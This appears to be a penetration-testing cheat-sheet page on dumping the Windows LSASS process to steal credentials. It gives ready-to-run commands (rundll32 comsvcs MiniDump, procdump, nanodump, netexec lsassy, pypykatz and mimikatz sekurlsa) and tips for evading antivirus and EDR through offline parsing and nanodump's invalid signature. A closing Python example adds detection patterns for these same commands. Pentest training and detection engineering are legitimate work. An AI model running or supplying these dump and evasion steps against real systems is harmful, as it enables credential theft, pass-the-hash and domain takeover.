FOOTHOLD Methodology Cheat-sheet
Post ✓ EXAM-SAFE medium :445

LSASS Dump — comsvcs MiniDump, nanodump, procdump, pypykatz

With local admin / SYSTEM, dump the lsass.exe process from memory and extract cleartext passwords, NTLM hashes and Kerberos tickets. Write a minidump to disk (comsvcs.dll, procdump, nanodump) and parse it offline with pypykatz/mimikatz, which avoids the AV's live mimikatz detection.

Info: PREREQUISITES
  • Local admin or SeDebugPrivilege/SYSTEM on the target machine
  • A way to move the minidump file to Kali for offline parsing

Commands

netexec ✓ EXAM-SAFE admin
nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} -M lsassy
Dumps lsass remotely and parses it with lsassy, printing hashes/cleartext directly to the screen. NetExec Wiki — lsassy module; HackTricks — LSASS dumping
cmd ✓ EXAM-SAFE admin
tasklist /fi "imagename eq lsass.exe"
On Windows, first find the lsass.exe PID (the comsvcs minidump requires it). HackTricks — Dumping LSASS (comsvcs)
rundll32 ✓ EXAM-SAFE admin
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full
Dumps lsass to disk with the built-in comsvcs.dll MiniDump (LOLBin, no extra tool needed). HackTricks — LSASS comsvcs.dll MiniDump
procdump ✓ EXAM-SAFE admin
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
Takes a full memory dump with Sysinternals procdump (signed, AV-friendly). HackTricks — LSASS procdump
nanodump ✓ EXAM-SAFE admin
nanodump.x64.exe --write C:\Windows\Temp\lsass.dmp
Stealthy LSASS dump: writes the minidump with an invalid signature, making AV/EDR detection harder. HackTricks — nanodump; Coalfire nanodump repo
pypykatz ✓ EXAM-SAFE
pypykatz lsa minidump C:/loot/lsass.dmp
Parses the minidump offline on Kali; extracts NTLM hashes, cleartext and Kerberos tickets. HackTricks — pypykatz offline parse; WADComs — pypykatz
mimikatz ✓ EXAM-SAFE
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
Switches mimikatz to offline minidump mode and extracts the credentials (on a Windows analysis host). HackTricks — mimikatz sekurlsa::minidump; help-mimikatz
mimikatz ⚠ RESTRICTED admin
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
Live lsass parse: fast, but the method most often caught by AV/EDR. HackTricks — mimikatz logonpasswords; help-mimikatz

Why is LSASS the target?

lsass.exe (Local Security Authority Subsystem) holds the credential material of interactively logged-on users in memory: NTLM hashes, in some configurations cleartext passwords (if WDigest is enabled), and Kerberos TGT/TGS tickets. Once you are local admin on a machine, dumping lsass means stealing the identity of every user who has logged on to it. If a domain admin has RDP'd to that machine, dumping it makes you DA.

Strategy: take a dump -> parse it offline

Live mimikatz sekurlsa::logonpasswords is the noisiest method and is caught instantly by Defender/EDR. The preferred flow in OSCP/real pentests:

  1. Write a minidump to disk (comsvcs.dll, procdump or nanodump).
  2. Move the dump file to Kali (help-transfer).
  3. Parse it offline (pypykatz lsa minidump or mimikatz sekurlsa::minidump).

That way the parsing happens on your own host rather than on the target machine, where the EDR cannot see it.

comsvcs.dll (LOLBin)

The MiniDump export of the built-in comsvcs.dll dumps lsass without installing any extra tool. First find the lsass PID with tasklist, then run rundll32 ... MiniDump <PID> path full. Do not hardcode the PID, since it is dynamic.

procdump vs nanodump

  • procdump: Microsoft-signed, most AVs whitelist it; but the 'lsass' argument can trigger ML-based detection.
  • nanodump: bypasses signature-based detection by writing an invalid minidump signature; stealthier in EDR environments.
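The command lines this sheet lists are also exactly what process-creation telemetry (Sysmon Event ID 1, Windows Security 4688) keys on from the defender's side. As an added example, not part of the cheat-sheet, a small Python scan over constructed log lines flags them; the log format, host names and PID are assumed:

```python
import re

# Patterns derived from the dump commands listed on this cheat-sheet.
LSASS_DUMP_PATTERNS = {
    "comsvcs_minidump": re.compile(r"comsvcs\.dll.*minidump", re.I),
    "procdump_lsass": re.compile(r"procdump.*\blsass\b", re.I),
    "nanodump": re.compile(r"nanodump", re.I),
    "mimikatz_sekurlsa": re.compile(r"sekurlsa::", re.I),
    # PID lookup alone is low-signal; it only matters next to a dump command.
    "tasklist_lsass": re.compile(r"tasklist.*imagename eq lsass\.exe", re.I),
}

# Constructed sample lines resembling a process-creation event's command-line field.
SAMPLE_LOGS = [
    r'host=WS01 user=SYSTEM cmd="C:\Windows\System32\svchost.exe -k netsvcs"',
    r'host=WS01 user=admin cmd="tasklist /fi \"imagename eq lsass.exe\""',
    r'host=WS01 user=admin cmd="rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\lsass.dmp full"',
    r'host=WS02 user=ops cmd="procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp"',
    r'host=WS03 user=bob cmd="notepad.exe report.txt"',
]


def classify(cmdline):
    """Return the names of every LSASS-dump pattern that matches one command line."""
    return [name for name, rx in LSASS_DUMP_PATTERNS.items() if rx.search(cmdline)]


def scan(lines):
    """Return (line_no, severity, matched_patterns) for each suspicious line.
    A tasklist-only hit is 'low'; any actual dump or parse command is 'high'.
    """
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = re.search(r'cmd="(.*)"\s*$', line)   # pull the command-line field
        cmdline = m.group(1) if m else line
        names = classify(cmdline)
        if not names:
            continue
        severity = "high" if any(n != "tasklist_lsass" for n in names) else "low"
        hits.append((line_no, severity, names))
    return hits


if __name__ == "__main__":
    for line_no, severity, names in scan(SAMPLE_LOGS):
        print(f"line {line_no}: {severity} {names}")
```

On the constructed sample the scan reports line 2 as low (PID lookup) and lines 3 and 4 as high (comsvcs and procdump dumps); correlating a low hit with a following high hit on the same host is the usual way to raise confidence.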

Common mistakes

  • WDigest is off by default on modern Windows => you may see no cleartext, only NTLM hashes. That is enough (pass-the-hash).
  • If Protected LSASS (RunAsPPL) is enabled, a normal dump fails; mimikatz !+/!processprotect or a driver is needed (generally out of OSCP scope).
  • Delete the dump file when you are done (cleanup); do not leave plaintext credentials on disk.

Sources
